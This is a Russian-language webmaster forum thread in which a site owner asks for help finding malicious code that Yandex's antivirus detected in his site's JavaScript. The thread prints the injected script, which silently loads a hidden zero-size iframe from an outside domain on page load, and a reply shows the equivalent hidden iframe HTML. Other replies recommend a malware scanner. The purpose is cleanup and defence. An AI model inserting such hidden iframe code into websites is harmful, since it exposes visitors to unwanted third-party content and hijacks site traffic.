[dobrik]

Добрый день. Яндекс начал ругаться на парочку моих сайтов.
Долго мучался с поиском, потом решил отписать платонам.
Вот что я получил:

1

Для сайта _beahalthy.ru

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания:

var ifeaa0IN = document.createElement('iframe');ifeaa0IN.name = 'ifeaa0IN';ifeaa0IN.src = 'http://wenbut.fatfree.net/';ifeaa0IN.style.width = '0px';ifeaa0IN.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifeaa0IN=') == -1) {document.cookie = 'ifeaa0IN=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(ifeaa0IN);}};

[свернуть]

Ну никак не могу найти код этот. Люди, помогите=)
Готов даже скромно отблагодарить доброго человека, который согласится помочь мне.
Для связи: ICQ 466997474

[liveman]

dobrik, в шаблоне где-то (после подвала) подгружается

PHP код:

<iframe name="ifI1f93" src="http://wenbut.fatfree.net/" style="width: 0px; height: 0px;"> 


[worldfoto]

Юзайте AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.

[Seopublic]

в 90% случаях это iframe, который пополняет свою посещаемость за счёт других сайтов.